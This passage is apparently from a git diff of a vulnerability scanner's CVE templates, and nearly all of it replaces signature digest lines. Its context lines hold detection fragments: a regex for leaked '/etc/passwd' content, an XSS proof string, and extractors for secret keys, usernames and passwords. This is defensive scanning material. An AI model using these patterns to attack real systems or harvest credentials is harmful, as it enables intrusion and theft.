490a00463044022031b5488afceb70b17db8337cc42043d537bbbfc08c3c24e22f7f5e16b8df6dd002200cfeb374c11d8920bb450df18025a6713a88c6ac7ef5dea580bacac7fde38650:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204fd7841cedd391a9e05e2c14d71b64aa59fccb03d4d6841bcbca28435df57665022071149e377b1acd920da93da1819fce9b7b90edb1e83dc2543b422ae69298756f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 7570b83f01..cda0abd21e 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -39,5 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "searchwp-live-search-result")' condition: and - -# digest: 4a0a00473045022000d3a4861784417b34275180709059a434d11dc342f0c1fcbb730b7991b513fb022100a2a167ac32ff9acdfb8f874374eb67db8663b91a99cdf767cd1f1b1df376a399:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e48b19cfb098d99e468f1a4b6b1a82fb11a56e87234bddf0128e8c83d766f826022100e34ba03833a1acd2bcae2ab1a4cef0ccd0af1ca1c821450f3b0a92809a15cfeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 95720de47e..0675122e87 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204ab3c5bdd05bc1df8d38bd18b69e29e58cd80c99d939a6f44d707e155d52589d02202239bfb51920630e23f7b53d03b6e3fc7c718b403bed3a5a4edf6866fc477824:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220380dc5b65aaaa343e01e296768d4b77ee3667eb48d6ae73cd26dee51ebce7dc10221008c4a3b53a32e333454fbeaea4090301522d69591c80987a844ea36c7becc17f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index 51bd289b9e..ffdbf9bd29 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 480a00453043021f732928ffd8769a9138e9a321d93b1d0e2626aa2f2677e8dd800d99ce472ec802200f25bc1ed6a5e135fda3b0d67554027ef9020f6b6c15124128d882f6f0f19e98:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bc010c748ba4d5e36c8056e3eaa9fd30f8f62eebbec8443584e71712a98699390220632930868298896928f363a769da64cae2e49d52e4a07c3611f6744d00bfcefe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 6e80834014..e685897afd 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -61,5 +61,4 @@ http: regex: - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"' internal: true - -# digest: 490a0046304402205d23c1ccba38294ed5a13c65013db22c186a0d0f33b7198a56d4c0e63dd8f9a4022006180e14b83d971815018a3a7505bc0d8f41f38e3981ae245c3d101b6294ee6b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c1ae4711b04e6e7159ae2dcb812b029f1c0e76abe8693998f6f108b026a1ffae022100d2a8aba67e932d01ea9637aaa01b263d8aed2949266ef79542e8c0da95d53583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 42c097b9c2..db6586d263 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -48,5 +48,4 @@ http: - 500 - 404 condition: or - -# digest: 4a0a0047304502203b9f331281ac4a55c8a8eb92b0a3a07b0f09974801ef2207ebde0f7338e28968022100b8fbc24b65dcc98331955c1ee3a3228773fb5e539e12bf0916165beb0d0c036c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202928adcf60d877a66c17f7441e6efcc6f657a8b7404c241cf19a60febbfb482c022033f7aa339cb183e5ca5976ce3bcf56728728ff162bd58e9adc038c69910ef3c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index 16584cc1f9..59beae1dcd 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200c90004351ef58a39ba6fd92aaaf0690a00333e5c9043960241838059489d3ba02201e48c4e537857037f545b8776ed2a160b5a3ebff82853232f2fe8f046fb02c3d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022025eba9b1f687a677822da2dee72c4ac200dae48c395c40c70c66e4e1fd2222c8022100b427afa031d3caa1633cc8698ecec07d44a5923c5881f669cd6c42f7e08dd172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index eb1a37e43b..0d3ccbdf38 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009c37372f0801271b8447b726eb077c204342512eb8cf4cfeb3a5a9a723e4513b022100e6b99bb19b098aa08971a9a01687a41c6515c9436465f68b22508cc44555ba4f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201e05f52ebc9e4f39dd51e9e4b0b2c88055ca181ea6ddd5095ebed02c6d0f3c14022100d7b353f50fa3cf38907e9c3ebaf4c3db614e83c98d9bf3426d574859dc8c99a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 347d11bd5f..94304db9cb 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -71,5 +71,4 @@ http: regex: - SET avatar = '(.*?)' internal: true - -# digest: 4b0a00483046022100fb1372ec455e615a9c0518ff287c30405975e287e150dda50977ddfbb6ce65a8022100d5918ba16b04bb293148dfcb6da487a3379260318ae57edd5ef1196bdb099b0c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022067f14db1c9f778217c89843373203d7e0754043ce7e7619d73acb0371392e308022028ba849016c66f240a15c1d6bacd3844191fe00cd67f6ff4ecfdcbdc4feef3c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 699167eb11..635100f7b2 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c23dc163091f8c4d7a7ed4bd48a07c0de9ec7a636e04d6ad4b2b89a9122a61b1022100a02f1193de0310573cde42059b757f39c7072dee38f2f1830f4960bab29558c2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210096debb83e551e757fc147c1175374bb8d8f0c5e9d7c1d12e75f75a689cefcc4502203498cb3fe501bb0349efb8ac341c910fd66924579ea691f06c5ae3caff9bb60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index e2a90c9d6b..23f7ae22a4 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022042eb43d39485e3e2125c95344131fc02cebd6d092719b229b8c043a4d95fe9da02205fa10b8a7d6ff142ae1a18eb87c32004843a5691aa53bd5ca22149d7e5f2187f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f9f4ff321fcbda1544917c43e780c659987c9d9e108d613922b2c1558d6290f02207d740fc1dbbfaf59b6a6262c1ddd8fdd4571914ae83ce8591030e016ead382a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 2b21d30590..c465269301 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022070fad9d1ccbd1a32ff78bf300b4a4893f3705b780a0031b722964aeac4e913b8022100f4a14d4e9235cdbdb5dfbc90f4fd029e4e23c5842c8d4158901648a24215c0a9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100db50ac6499100e16ab9027b89e933f8d34edb2eb89a67eb8e46c5aad6af322f2022100bb4f649af21aafe027759d48fafbc891705b970b587ab5218e65999469b61b97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 5b498380cf..f7abcfa498 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100af5998db6b71535045efb31d424f8bafcfb2517a2def926bbb94c2988f0da303022038847bb4ec278778d57e42299455efc101bf7864f3efdc478b4bb851720684f8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207aba611f033a55f9d567bdb0bd57317a33e3dc03d0915fbef5d72c138d2281fc022074b1e3a9698c844bab96a520b9ab2e3b138713a2916685c61b9fc1b64961f693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index 7800fb6afc..1c5d4ba2a6 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c239bd9d7c4efada312ce1d83e2a6aa2972172ca4620a7e0591af80bf378a929022100ad99aa16e77ec7dbacfc4430f204d1f271df5229c6a7aa0920d02ec4a54e7743:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207ad476f90d20c731f837b3b9bdfc3660d9a06c7f76c81d0e83b5acc9bc116d8c022100cc2c6a684533a524ddf7a477d7f7318ef4dbc641328b31909d992e08bd91e55a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index ac80e42639..4485a12ec1 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022032705effe84b14b668321b3501b60a81c36cb2b7026b74abf3f62624404d8ca3022047411c90d10fa28530e1f1c2c4ddb347e422993c6048e2f2de6f2f8f7f131564:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205dd01849311ff728faf14836c96f7db1a7a3004e6c2f7e93c8ebdf030d6e495702207c4b3a417212489b712508a8d567e73a03c163995e462bfb2f81568ada29e09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 3a81c9b718..a37cd27653 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -61,5 +61,4 @@ http: - '"password":"(.*?)"' - '"username":"(.*?)"' - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' - -# digest: 4b0a00483046022100c0c7241de806003c25983c6cf401bb8d27f5db3cda1780f2c90214756d629ead022100a9bd249f7c80e393d12cd08233cfae5a872ea95659b9debbcc23e7299dc1ef45:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220446f84beab4a9ca2bc4de37c14d010990ad692d9f061af1a9fd909f995c39b150221008bfdc2ab0a08f287456fe108adeab37c62af9867a202fc98877a461694e4748d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 55d44c00cf..76a91cf98e 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ecf83c7d2c209b120954563a7040aa20923b977ac395c1d5f2e629f91befe9970220091907e269b48ffa9c19e4be7a84ec830e116f311c04774c6a33d99bfa1aa8d3:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022057c237876903043a4ed10620e27585b0c53a3423a982e06aacfc91a5cb560608022006fddb8bdba9a2ab231321f107c67b860d41cb3e0d06334083ff28570d8afbf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 668a058001..7c2c8612b0 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -41,5 +41,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4a0a00473045022100e34e5ed9a4e78a0d692195ac54965a99e929b8ea9ffb36fea37165bb33b22d9002203bda937bc48ed21464261d489afa1570b92f2302a85bb033b8931b7b38aae150:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205d881ce2ffe2876c4cd1f87775d6cac4fa3f99637694cc4572b3bac14e45224c0220490963d0f39fb412a97d387cdc01b31ef29b802b61fef3972037afb1c4015887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 6bddb1e516..94a19df44a 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -40,5 +40,4 @@ headless: - '{{str}}') condition: and - -# digest: 4b0a00483046022100becc63139b7e777d500d61fb21b5d0409eb08ea8314eacb873c431be92a61611022100f0f19c2e636fbad1190369aa123c7a3238042eaf9c2a252aacbf7e35ffda0d9d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022069b6cdef9e60002500854e09ed380a87ccb60b7753a8f616f5e422ad260b0feb022100ee228ac31e87751ff7066a74c50bfa0105a647da440ece2ab59bcca88eaed82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 5d5aef986b..1619f04cab 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022008837e5e804effddacc96e4ce874e08f2453f39369e9da817b5cb8e6cfaf1d92022100ea3e5acf037485623aa03f0ee475c82fba2c4ad1a29ef5262e9ba1477558f6c0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210080d1648b8b6a016fa04f448dc5c28c4c0dcc427d200570c8e9f2b6015e731ee50221008741bf6192304e174377cf5fe36ae2012454cb5db9c1a0a62ba251f8c1d0849d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 18023dde34..b71572d5bf 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -46,5 +46,4 @@ http: part: body words: - You are viewing page number - -# digest: 4a0a0047304502205acef3073a906f1aac3741c37f6fe9ec4066229b29becf9b7385256b88ec8920022100e3ec34bae56e885fde3467bded98223c1af84015f5a998ce1d0caf98e640ba87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d8df5fe187d3a4137c364cfc10b282114b83e7042e2cd365ec13e3b85dfb88f2022013eddb696b267475686c61f2953e976b791b3076cf7ad039bfe719436df9c783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 6e904494ab..151af2aa4d 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 400 - -# digest: 4b0a00483046022100d51bc5c244531499f76625dd211e1ea416808ef8428adf8acc5dfee6035f43910221008ecd1b0926c552694104607f32b2f3a2cd20a6a76c8c7a27d2a71f41b9427a68:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203e65c9be687922eb7b967375511f0280503748aaad678a299fe5e0b4e6d33abc02210092807cd0a6a02231981dd77e7f9cc25026fa3f28e0a15997b389bdc1d8c02755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 9e7248d291..411d352f47 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -57,5 +57,4 @@ http: - "" internal: true part: body - -# digest: 4b0a0048304602210088d1f78588c780f4c21f033880a42f325d0b8689c279bb7c8c9e6d54fb7114a9022100982fe5d409a2263607c71bf2783376ae3b4e66ef8f6c38c645f3018219ba46f7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200b970c3237b50dcada44accc1a2a7b457bb0fb31973afce4fb52961c07268ca5022100eba8f4e731783be049d7f214f1cf43c3a5a96465c41f0a3315db44ebcdb5d8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index 33d996758f..0925385de8 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220414fbb8f358e9ce70718f445a504928f5fc34c73a6c9c2c1c0128bbc2fde0fa102206d13762ce4449ba153a78428a02e7bb13bf66efc8282ca06bb3451b04ef1ef0e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008dc985496a38086419eb681d7372b9d152ca82de703ad11b067d7028bb676ba1022100bd547f18c137d84bd638bf318ef59c77609672af2faa2d2b4b3d9818d9452d03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 5e9cfd7491..5dc66ba4cc 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -46,5 +46,4 @@ http: part: body regex: - "root:.*:0:0" - -# digest: 490a0046304402202c49a4f3ada57ec033e9c879491857255c78bd043f21035bd212fc8d0f887389022002a35424d16029f41faa3a3c82f9fc2eb604ea9ad1a56347ab660da70e7ad170:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b0a8cbdb2ecb84370c61ae7442285a88456c88b31ae084625898116c8ee511f9022031a76bbe39fc875629b8cbdd4e340edeb71fb4556b76b864192e598961394780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 9da4379597..13353ffca6 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cc46b0db4f326c9761e5bbc9c742010305e355390b9e3e29e09a41fb59b5602a022021b4b2e5a13364a206f2d78a582b3a3a9bb91845ffb762806747dce57f01828b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f4ba6d9ae7f965561e64891b315f200a7e45f3a6bac9a7929ca7467d1bdcc8ac02210086f10de5b95409b4073fbaf2fdf08de28e430dc940a8595dfe7d86e00fc36a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 7fcf14594b..305e2e3d30 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -51,5 +51,4 @@ http: - contains(body_1, "User authentication Failed") - contains(body_2, "User Login Failed for SSLVPN User.") condition: and - -# digest: 490a0046304402206cabf0d3dfacd1a894581321ca706d47606fed15b0f29bb30c8572206c6db949022079a3c0ca8bc73ea08dd68cf7c270d203b4811a392e9b09e0862dffe787ef02c2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b759527af5f829de9a63f2ad57b69231d28f1c11a4be235e934cd9e43381520802202ece2d1d69c6b774f15e5f25edbb088921936fcc03e7bd8efa3846f28444b157:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index dc20214bcd..bbbc2b8cea 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -62,5 +62,4 @@ http: group: 1 regex: - "(?m)Stable tag: ([0-9.]+)" - -# digest: 4a0a00473045022100ddf7d7a04a61e490c40c1d859367634787628dd73d8b2adeaf54b10d857740c002205b206384f8b23daa6fc48fb46a9f1618a23905f32e718e5138fb2cb92398fa06:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201717ca7db900b45476d21c188be02c6465a72f8b829dfeeab9097293d4e09eae022100870524bc1883dcb80c78efe88224c43af68e69a967ead3e9b89c8d5397f06023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index d2a32a555d..376027fef0 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -52,5 +52,4 @@ http: - type: dsl dsl: - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" - -# digest: 4b0a00483046022100ed8c9de0419de6d7e2d674d1600c9710b38ec6ef13e9c653af2c81dc41a3de320221008540eb115f419109e0e6f7a364d91606b2f4e0abb7e05010567192cacaf1d009:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d4380b4fd4c8243e85e6286196c2d47b4b337dab07eddaf97620b80fdd0c37da022100d581206faa467652bd29d42582db4012fb8a89531c0f61ccff4402facc53c7a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 29a12166a3..3f4814c8e6 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e83e8d119f2fb495b15ad53ad888922123964fcf0588cff9d8cd7286c1b566310221008fafd08e89f3325f7f2406f499be076065e4d7879bc00280077319db3270c94f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022007d394ed92b42642505294a8d74c09aa8d2c3879b0e57af6266e9b2a14d01b4502206c5c053ff9f17e8ff15f46ecd851cee9d9d6bb0819f737b01cc7986ab4cea108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 981c96a680..2f93e894b9 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220158d15db4552791b7ef0abdac7ba8793cc9f62e548ee2d084b3bf04521f790d5022100bd0a04c64e51defef62412edaad26558ffe83acdf5db561ef2480b7845bcbe29:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ea1c913f8784acfd56e33579a06f33b259bf18c81e4f643bea0a42e6b1f12554022100ebbc78a76a043bb02aaec08a59d0996b57d2e97a0e74dc94e8a81e1b3c5ff39d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index f8df40459d..5816e593db 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -76,5 +76,4 @@ http: - '' internal: true part: body - -# digest: 490a00463044022073644c525f612e1944e65dda8027f542b6a73b983021c61c63f11690b5a656b7022003c1298852e694c43695fea416a439ecf16bea239da6c93d2e3a4cda47504e47:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009d2714b9bdbd656c6a868833c2f63003678029db695f228e56a6ed986091d9a002200de748305ba4432c2819000a3796d494154335afc5ee78cf2ab06ae2a9bb8ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 42d5a6c256..303923a214 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008da59b4db9b8851a54006329a2fb0734edbe115334e5b5155ac62d882efcd3920221008d799a360cb23de0e6b57d6dab55e87eeb128b69e915af507adcb1db550f7933:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e2c17f1406e5f6e4895e27cc444f543320ebf6eea236868823bf8663d70a7f510220361d492d4477f2fdca6bc7f36dc759cb36ac89486b5601ff31abab4623d97f6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index 11084a3179..3687a317ff 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201ce67a0840970c429799edf52218c07f4d05a958783315ee8e30647b1e91a643022042d2d35823c4a109f5f7a905108d1b056713d695e75b18db629a8f9bd6e55545:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e41677df85293a5860539e90c4c1d990b2a2b76bd45c52d254545e326737a355022100fd823d5b83c839823522c679906e75c7b49fbaebd6854fc1fa89eede497aa8f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 8648dbe329..f1f54a681b 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f9e96e11c0024848ef682268155983ebd4de30fbd4a01774725a94ec0c68eb7b022046381525f07aee0fff7aa044754e8e7fc8ef661dca0163373f0bb1d9dc20eea1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c14bd3859bd4afb12e4b0cae70da1082ccf8c0a74bf244779f27013e645f0d39022100c2b78af794cc4890cf698340abb218ae1381e4a72609ffa7485765a4a53f8ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index ee35b1c45c..2b9e1e28f6 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c3ecd404f0ffd33b496d9bc70307ba7dd97e87cea3e7d2613df1d35ed113544a02206b2e20d28ff5e4b08023daacf661dc5fbf05a2149d8356b0faac62b7ec148b47:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022040d0af4fabd49a2f4f6153fe96947c92804e2378d1a459a7083af4eebdcd2fe10220329e5b8ff802b0a7a0e452612926a880a38115889363ca8920d0a9489531e113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 2828265950..fb73ebaff9 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 500 - -# digest: 490a00463044022076c2ab8a0d6f5dc7bbf97f0315faf215c2178809c2255505b5578628726bbdb8022053dad44255c737fd0f07bcf2d92f7e8d10e724732cd73770f65c91bdb38e4b55:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dcd19bd6096ffb1777f36d97b0596552c0c880906d01226a71411b80dccbae84022100bacb1c9c851259e7d29600a77432b78dd83097aec5e526a02f96446a46e97934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index f00df92983..5bd01ac1cb 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "ee-simple-file-list")' - 'contains(body_2, "onanimationstart=alert(document.domain)//")' condition: and - -# digest: 